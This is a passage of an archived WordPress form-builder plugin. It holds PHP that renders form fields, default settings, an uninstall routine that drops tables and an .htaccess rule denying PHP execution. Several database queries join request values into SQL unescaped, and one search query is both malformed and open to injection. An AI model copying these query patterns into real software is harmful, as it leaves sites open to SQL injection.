              for($k=1; $k<=$param['w_scale_amount']; $k++)
              {
                $radio_buttons .= '<div id="'.$id.'_scale_td2_'.$k.'form_id_temp" style="display: table-cell;"><input id="'.$id.'_scale_radioform_id_temp_'.$k.'" name="'.$id.'_scale_radioform_id_temp" value="'.$k.'" type="radio"></div>';
              }
              
              $rep ='<div id="wdform_field'.$id.'" type="type_scale_rating" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; vertical-align: top; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_scale_rating" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_scale_amount'].'" id="'.$id.'_scale_amountform_id_temp" name="'.$id.'_scale_amountform_id_temp"><div id="'.$id.'_elementform_id_temp" style="float: left;" '.$param['attributes'].'><label class="mini_label" id="'.$id.'_mini_label_worst" style="position: relative; top: 6px; font-size: 11px; display: inline-table;">'.$w_mini_labels[0].'</label><div id="'.$id.'_scale_tableform_id_temp" style="display: inline-table;"><div id="'.$id.'_scale_tr1form_id_temp" style="display: table-row;">'.$numbers.'</div><div id="'.$id.'_scale_tr2form_id_temp" style="display: table-row;">'.$radio_buttons.'</div></div><label class="mini_label" id="'.$id.'_mini_label_best" style="position: relative; top: 6px; font-size: 11px; display: inline-table;">'.$w_mini_labels[1].'</label></div></div></div>';
                  
              break;
            }
            case 'type_spinner':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_step', 'w_field_value', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_spinner" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_spinner" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_field_width'].'" name="'.$id.'_spinner_widthform_id_temp" id="'.$id.'_spinner_widthform_id_temp"><input type="hidden" value="'.$param['w_field_min_value'].'" id="'.$id.'_min_valueform_id_temp" name="'.$id.'_min_valueform_id_temp"><input type="hidden" value="'.$param['w_field_max_value'].'" name="'.$id.'_max_valueform_id_temp" id="'.$id.'_max_valueform_id_temp"><input type="hidden" value="'.$param['w_field_step'].'" name="'.$id.'_stepform_id_temp" id="'.$id.'_stepform_id_temp"><input type="" value="'.($param['w_field_value']!= 'null' ? $param['w_field_value'] : '').'" name="'.$id.'_elementform_id_temp" id="'.$id.'_elementform_id_temp" onkeypress="return check_isnum_or_minus(event)" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].' disabled/></div></div>';
              break;
            }
            case 'type_slider': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_field_width','w_field_min_value','w_field_max_value', 'w_field_value', 'w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {	
                $temp = explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'] . ' add_' . $attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
              $rep ='<div id="wdform_field'.$id.'" type="type_slider" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; vertical-align: top; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_slider" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_field_width'].'" name="'.$id.'_slider_widthform_id_temp" id="'.$id.'_slider_widthform_id_temp"><input type="hidden" value="'.$param['w_field_min_value'].'" id="'.$id.'_slider_min_valueform_id_temp" name="'.$id.'_slider_min_valueform_id_temp"><input type="hidden" value="'.$param['w_field_max_value'].'" id="'.$id.'_slider_max_valueform_id_temp" name="'.$id.'_slider_max_valueform_id_temp"><input type="hidden" value="'.$param['w_field_value'].'" id="'.$id.'_slider_valueform_id_temp" name="'.$id.'_slider_valueform_id_temp"><div id="'.$id.'_slider_tableform_id_temp"><div><div id="'.$id.'_slider_td1form_id_temp"><div name="'.$id.'_elementform_id_temp" id="'.$id.'_elementform_id_temp" style="width: '.$param['w_field_width'].'px;" '.$param['attributes'].'"></div></div></div><div><div align="left" id="'.$id.'_slider_td2form_id_temp" style="display: inline-table; width: 33.3%; text-align: left;"><span id="'.$id.'_element_minform_id_temp" class="label">'.$param['w_field_min_value'].'</span></div><div align="right" id="'.$id.'_slider_td3form_id_temp" style="display: inline-table; width: 33.3%; text-align: center;"><span id="'.$id.'_element_valueform_id_temp" class="label">'.$param['w_field_value'].'</span></div><div align="right" id="'.$id.'_slider_td4form_id_temp" style="display: inline-table; width: 33.3%; text-align: right;"><span id="'.$id.'_element_maxform_id_temp" class="label">'.$param['w_field_max_value'].'</span></div></div></div></div></div>';
              break;
            }
            case 'type_range': {
              $params_names = array('w_field_label_size','w_field_label_pos','w_field_range_width','w_field_range_step','w_field_value1', 'w_field_value2', 'w_mini_labels', 'w_required','w_class');
              $temp = $params;
              foreach ($params_names as $params_name ) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {	
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              $rep ='<div id="wdform_field'.$id.'" type="type_range" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_range" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_field_range_width'].'" name="'.$id.'_range_widthform_id_temp" id="'.$id.'_range_widthform_id_temp"><input type="hidden" value="'.$param['w_field_range_step'].'" name="'.$id.'_range_stepform_id_temp" id="'.$id.'_range_stepform_id_temp"><div id="'.$id.'_elemet_table_littleform_id_temp" style="display: table;"><div style="display: table-row;"><div valign="middle" align="left" style="display: table-cell;"><input type="" value="'.($param['w_field_value1']!= 'null' ? $param['w_field_value1'] : '').'" name="'.$id.'_elementform_id_temp0" id="'.$id.'_elementform_id_temp0" onkeypress="return check_isnum_or_minus(event)" style="width: '.$param['w_field_range_width'].'px;"  '.$param['attributes'].' disabled/></div><div valign="middle" align="left" style="display: table-cell; padding-left: 4px;"><input type="" value="'.($param['w_field_value2']!= 'null' ? $param['w_field_value2'] : '').'" name="'.$id.'_elementform_id_temp1" id="'.$id.'_elementform_id_temp1" onkeypress="return check_isnum_or_minus(event)" style="width: '.$param['w_field_range_width'].'px;" '.$param['attributes'].' disabled/></div></div><div style="display: table-row;"><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_from">'.$w_mini_labels[0].'</label></div><div valign="top" align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_to">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
              break;
            }
            case 'type_grading': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_items', 'w_total', 'w_required', 'w_class');
              $temp = $params;
              foreach($params_names as $params_name) {
                $temp = explode('*:*' . $params_name . '*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {	
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs	= array_slice($temp, 0, count($temp) - 1);   
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "table-cell" : "block");
              $required_sym = ($param['w_required'] == "yes" ? " *" : "");
              $w_items = explode('***', $param['w_items']);
              $grading_items = '';
              for($i=0; $i<count($w_items); $i++)
					{
						$grading_items .= '<div id="'.$id.'_element_div'.$i.'" class="grading"><input id="'.$id.'_elementform_id_temp_'.$i.'" name="'.$id.'_elementform_id_temp_'.$i.'" onkeypress="return check_isnum_or_minus(event)" value="" size="5" onkeyup="sum_grading_values('.$id.',&quot;form_id_temp&quot;)" onchange="sum_grading_values('.$id.',&quot;form_id_temp&quot;)" '.$param['attributes'].' disabled/><label id="'.$id.'_label_elementform_id_temp'.$i.'" class="ch-rad-label">'.$w_items[$i].'</label></div>';
					}
									
					$rep ='<div id="wdform_field'.$id.'" type="type_grading" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; vertical-align: top; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_grading" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_total'].'" name="'.$id.'_grading_totalform_id_temp" id="'.$id.'_grading_totalform_id_temp"><div id="'.$id.'_elementform_id_temp">'.$grading_items.'<div id="'.$id.'_element_total_divform_id_temp" class="grading_div">Total:<span id="'.$id.'_sum_elementform_id_temp" name="'.$id.'_sum_elementform_id_temp">0</span>/<span id="'.$id.'_total_elementform_id_temp" name="'.$id.'_total_elementform_id_temp">'.$param['w_total'].'</span><span id="'.$id.'_text_elementform_id_temp" name="'.$id.'_text_elementform_id_temp"></span></div></div></div></div>';
											
					break;
            }
            case 'type_matrix': {
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_field_input_type', 'w_rows', 'w_columns', 'w_required','w_class','w_textbox_size');
              $temp = $params;
              foreach ($params_names as $params_name) {
                $temp = explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
              }
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");
			  $param['w_textbox_size'] = isset($param['w_textbox_size']) ? $param['w_textbox_size'] : '100';
              $w_rows = explode('***',$param['w_rows']);
              $w_columns = explode('***',$param['w_columns']);
              $column_labels = '';
              for ($i = 1; $i < count($w_columns); $i++) {
                $column_labels .= '<div id="'.$id.'_element_td0_'.$i.'" class="matrix_" style="display: table-cell;"><label id="'.$id.'_label_elementform_id_temp0_'.$i.'" name="'.$id.'_label_elementform_id_temp0_'.$i.'" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$i.'" value="'.$w_columns[$i].'">'.$w_columns[$i].'</label></div>';
              }
              $rows_columns = '';
              for($i=1; $i<count($w_rows); $i++)
					{
					
						$rows_columns .= '<div id="'.$id.'_element_tr'.$i.'" style="display: table-row;"><div id="'.$id.'_element_td'.$i.'_0" class="matrix_" style="display: table-cell;"><label id="'.$id.'_label_elementform_id_temp'.$i.'_0" class="ch-rad-label" for="'.$id.'_elementform_id_temp'.$i.'" value="'.$w_rows[$i].'">'.$w_rows[$i].'</label></div>';
						
						
						for($k=1; $k<count($w_columns); $k++)
						{
							if($param['w_field_input_type']=='radio')
								$rows_columns .= '<div id="'.$id.'_element_td'.$i.'_'.$k.'" style="text-align: center; display: table-cell;  padding: 5px 0 0 5px;"><input id="'.$id.'_input_elementform_id_temp'.$i.'_'.$k.'" align="center" size="14" type="radio" name="'.$id.'_input_elementform_id_temp'.$i.'" value="'.$i.'_'.$k.'" disabled/></div>';
							else
								if($param['w_field_input_type']=='checkbox')
									$rows_columns .= '<div id="'.$id.'_element_td'.$i.'_'.$k.'" style="text-align: center; display: table-cell;  padding: 5px 0 0 5px;"><input id="'.$id.'_input_elementform_id_temp'.$i.'_'.$k.'" align="center" size="14" type="checkbox" name="'.$id.'_input_elementform_id_temp'.$i.'_'.$k.'" value="1" disabled/></div>';
								else
									if($param['w_field_input_type']=='text')
										$rows_columns .= '<div id="'.$id.'_element_td'.$i.'_'.$k.'" style="text-align: center; display: table-cell; padding: 5px 0 0 5px;"><input id="'.$id.'_input_elementform_id_temp'.$i.'_'.$k.'" align="center" type="text" name="'.$id.'_input_elementform_id_temp'.$i.'_'.$k.'" value="" style="width:'.$param['w_textbox_size'].'px" disabled/></div>';
									else
										if($param['w_field_input_type']=='select')
											$rows_columns .= '<div id="'.$id.'_element_td'.$i.'_'.$k.'" style="text-align: center; display: table-cell; padding: 5px 0 0 5px;"><select id="'.$id.'_select_yes_noform_id_temp'.$i.'_'.$k.'" name="'.$id.'_select_yes_noform_id_temp'.$i.'_'.$k.'" disabled><option value=""> </option><option value="yes">Yes</option><option value="no">No</option></select></div>';
								
						}
							
						$rows_columns .= '</div>';	
					}
						
					
						
					$rep ='<div id="wdform_field'.$id.'" type="type_matrix" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_matrix" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_field_input_type'].'" name="'.$id.'_input_typeform_id_temp" id="'.$id.'_input_typeform_id_temp"><input type="hidden" value="'.$param['w_textbox_size'].'" name="'.$id.'_textbox_sizeform_id_temp" id="'.$id.'_textbox_sizeform_id_temp"><div id="'.$id.'_elementform_id_temp" style="display: table;" '.$param['attributes'].'><div id="'.$id.'_table_little" style="display: table-row-group;"><div id="'.$id.'_element_tr0" style="display: table-row;"><div id="'.$id.'_element_td0_0" style="display: table-cell;"></div>'.$column_labels.'</div>'.$rows_columns.'</div></div></div></div>';
											
					break;
            }
            case 'type_submit_reset': {
              $params_names=array('w_submit_title','w_reset_title','w_class','w_act');
              $temp=$params;
              foreach ($params_names as $params_name) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if ($temp) {
                $temp	= explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
              }
              $param['w_act'] = ($param['w_act']=="false" ? 'style="display: none;"' : "");	
              $rep='<div id="wdform_field'.$id.'" type="type_submit_reset" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><span id="'.$id.'_element_labelform_id_temp" style="display: none;">type_submit_reset_'.$id.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><input type="hidden" value="type_submit_reset" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><button type="button" class="button-submit" id="'.$id.'_element_submitform_id_temp" value="'.$param['w_submit_title'].'" onclick="check_required(&quot;submit&quot;, &quot;form_id_temp&quot;);" '.$param['attributes'].'>'.$param['w_submit_title'].'</button><button type="button" class="button-reset" id="'.$id.'_element_resetform_id_temp" value="'.$param['w_reset_title'].'" onclick="check_required(&quot;reset&quot;);" '.$param['w_act'].' '.$param['attributes'].'>'.$param['w_reset_title'].'</button></div></div>';
              break;
            }
            case 'type_button': {
              $params_names=array('w_title','w_func','w_class');
              $temp=$params;
              foreach($params_names as $params_name) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if ($temp) {	
                $temp	= explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
                }
              }
              $param['w_title']	= explode('***',$param['w_title']);
              $param['w_func']	= explode('***',$param['w_func']);
              $rep.='<div id="wdform_field'.$id.'" type="type_button" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><span id="'.$id.'_element_labelform_id_temp" style="display: none;">button_'.$id.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><input type="hidden" value="type_button" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp">';
              foreach ($param['w_title'] as $key => $title) {
                $rep.='<button type="button" id="'.$id.'_elementform_id_temp'.$key.'" name="'.$id.'_elementform_id_temp'.$key.'" value="'.$title.'" onclick="'.$param['w_func'][$key].'" '.$param['attributes'].'>'.$title.'</button>';				
              }
              $rep .= '</div></div>';
              break;
            }
          }
          
          $form = str_replace('%' . $id . ' - ' . $labels[$ids_key] . '%', $rep, $form);
          $form = str_replace('%' . $id . ' -' . $labels[$ids_key] . '%', $rep, $form);
          $row->form_front = $form;
        }
      }
    }
    else {
      $row = new stdClass();
      $row->id = 0;
      $row->backup_id ='';
      $row->title = '';
      $row->mail = '';
      $row->form = '';
      $row->form_front = '';
      $row->theme = $wpdb->get_var("SELECT id FROM " . $wpdb->prefix . "formmaker_themes WHERE `default`='1'");
      $row->javascript = '';
      $row->submit_text = '';
      $row->url = '';
      $row->submit_text_type = 0;
      $row->script1 = '';
      $row->script2 = '';
      $row->script_user1 = '';
      $row->script_user2 = '';
      $row->counter = 0;
      $row->label_order = '';
      $row->article_id = '';
      $row->pagination = '';
      $row->show_title = '';
      $row->show_numbers = '';
      $row->public_key = '';
      $row->private_key = '';
      $row->recaptcha_theme = '';
      $row->from_name = '';
      $row->from_mail = '';
      $row->label_order_current = '';
      $row->script_mail_user = '';
      $row->script_mail = '';
      $row->tax = 0;
      $row->payment_currency = '$';
      $row->paypal_email = '';
      $row->checkout_mode = 'testmode';
      $row->paypal_mode = 0;

      $row->published = 1;
      $row->form_fields = '';
      $row->savedb = 1;
      $row->sendemail = 1;
      $row->requiredmark = '*';
      $row->reply_to = 0;
      $row->send_to = 0;
      $row->autogen_layout = 1;
      $row->custom_front = '';
      $row->mail_from_user = '';
      $row->mail_from_name_user = '';
      $row->reply_to_user = '';
      $row->save_uploads = 1;

      $row->condition = '';
      $row->mail_cc = '';
      $row->mail_cc_user = '';
      $row->mail_bcc = '';
      $row->mail_bcc_user = '';
      $row->mail_subject = '';
      $row->mail_subject_user = '';
      $row->mail_mode = 1;
      $row->mail_mode_user = 1;
      $row->mail_attachment = 1;
      $row->mail_attachment_user = 1;
      
      $row->user_id_wd = '';
      $row->sortable = 1;
      $row->frontend_submit_fields = '';
      $row->frontend_submit_stat_fields = '';
    }
    return $row;
  }

  public function get_theme_rows_data($old = '') {
    global $wpdb;
    $rows = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "formmaker_themes WHERE css " . ($old ? 'NOT' : '') . " LIKE '%.wdform_section%' ORDER BY title");
    return $rows;
  }
  
  public function get_queries_rows_data($id) {
    global $wpdb;
    $rows = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "formmaker_query WHERE form_id=" . $id . " ORDER BY id ASC");
    return $rows;
  }
  
  public function get_labels($id) {
    global $wpdb;
    $rows = $wpdb->get_col("SELECT DISTINCT `element_label` FROM " . $wpdb->prefix . "formmaker_submits WHERE form_id=" . $id);
    return $rows;
  }
  
  public function is_paypal($id) {
    global $wpdb;
    $rows = $wpdb->get_var("SELECT COUNT(*) FROM " . $wpdb->prefix . "formmaker_sessions WHERE form_id=" . $id);
    return $rows;
  }

  public function page_nav() {
    global $wpdb;
	$where = 'WHERE `id` IN (' . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ')';
    $where .= ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE title LIKE "%' . esc_html($_POST['search_value']) . '%"'  : '');
    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "formmaker " . $where;
    $total = $wpdb->get_var($query);
    $page_nav['total'] = $total;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $page_nav['limit'] = (int) ($limit / 20 + 1);
    return $page_nav;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFromeditcountryinpopup_fmc.php000060400000004341152434416630016477 0ustar00<?php

class FMModelFromeditcountryinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelUninstall_fmc.php000060400000007775152434416630013656 0ustar00<?php

class FMModelUninstall_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function delete_db_tables() {
    global $wpdb;
    $true_or_false_forms = $wpdb->get_var("SELECT COUNT(*) FROM " . $wpdb->prefix . "formmaker WHERE `id` IN (" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ")");
    if ($true_or_false_forms) {
      $wpdb->query("DELETE FROM " . $wpdb->prefix . "formmaker WHERE `id` NOT IN (" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ")");
      $wpdb->query("DELETE FROM " . $wpdb->prefix . "formmaker_submits WHERE `form_id` NOT IN (" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ")");
      $wpdb->query("DELETE FROM " . $wpdb->prefix . "formmaker_views WHERE `form_id` NOT IN (" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ")");
	  delete_option('contact_form_forms');
    }
    else {
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_submits");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_views");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_themes");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_sessions");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_blocked");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_query");
      $wpdb->query("DROP TABLE IF EXISTS " . $wpdb->prefix . "formmaker_backup");
	  delete_option('contact_form_forms');
      delete_option("wd_form_maker_version");
      delete_option('formmaker_cureent_version');
      delete_option('fm_emailverification');
      delete_option('form_maker_pro_active');
	  
    }
	delete_option('fmc_settings');
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/.htaccess000044400000000424152434416630010723 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>admin/models/FMModelFormcontactwdmathcaptcha.php000060400000004337152434416630016057 0ustar00<?php

class FMModelFormcontactwdmathcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
